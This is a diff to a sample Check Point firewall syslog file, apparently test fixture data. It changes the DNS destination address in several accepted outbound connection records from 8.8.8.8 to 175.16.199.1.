-<134>1 2020-03-29T17:52:20Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e054,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504340"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58545"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:52:20Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e054,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504340"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59370"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:52:20Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e054,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504340"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47813"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:52:20Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e054,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504340"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40621"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:52:20Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e054,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504340"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58545"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:52:20Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e054,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504340"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59370"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:52:20Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e054,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"151.101.37.108"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"37970"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:52:20Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e054,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504340"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37678"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:52:20Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e054,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504340"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37678"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:52:21Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e055,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"99.86.116.53"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"32776"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:52:21Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e055,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504341"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54736"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:52:21Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e055,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504341"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47921"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:52:21Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e055,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504341"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54736"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:52:21Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e055,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504341"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47921"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:52:21Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e055,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"13.48.233.241"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58880"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:52:21Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e055,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"162.159.200.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39281"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:52:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e05a,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504346"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59656"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:52:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e05a,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504346"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53705"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:52:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e05a,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504346"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59656"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:52:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e05a,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504346"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53705"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:52:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e05f,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54355"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:52:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e05f,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.81.142.43"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"35426"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10131"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T17:52:32Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e060,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42003"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
@@ -3409,8 +3409,8 @@
 <134>1 2020-03-29T17:56:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e152,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:56:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e152,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50698"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T17:56:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e152,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50699"; service:"443"; service_id:"https"; src:"192.168.1.117"]
-<134>1 2020-03-29T17:57:17Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e17d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57591"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:57:17Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e17d,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504637"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56971"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:57:17Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e17d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57591"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:57:17Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e17d,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504637"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56971"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
